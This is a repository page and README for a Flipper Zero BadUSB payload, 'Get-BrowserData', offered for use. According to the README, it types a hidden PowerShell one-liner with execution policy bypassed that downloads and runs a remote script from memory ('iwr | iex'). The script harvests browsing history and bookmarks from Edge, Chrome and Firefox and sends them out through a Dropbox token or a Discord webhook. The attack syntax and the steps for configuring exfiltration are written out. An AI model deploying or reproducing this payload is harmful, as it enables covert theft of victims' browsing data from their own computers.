Flipper-Zero-BadUSB/Payloads/Flip-BrowserData
2022-12-21 18:37:26 -06:00
..
browserData.ps1 Update browserData.ps1 2022-12-21 18:37:26 -06:00
README.md Create README.md 2022-12-21 18:28:48 -06:00

Logo

Table of Contents
  1. Description
  2. The Function
  3. Contact
  4. Acknowledgments

Get-BrowserData

Python
YouTube Tutorial

Description

This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently)

They are then exfiled using either discord or dropbox

The Function

[Get-BrowserData]

  • Plug in your device
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
  • You no longer need to host your own version of this script
  • $db is the variable that holds your DropBox token
  • $dc is the variable that holds your Discord webhook
  • Fill in either variable or both to set your exfil method

SYNTAX:

powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr | iex

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Golang
Instagram
Jsonnet
Discord

(back to top)

Acknowledgments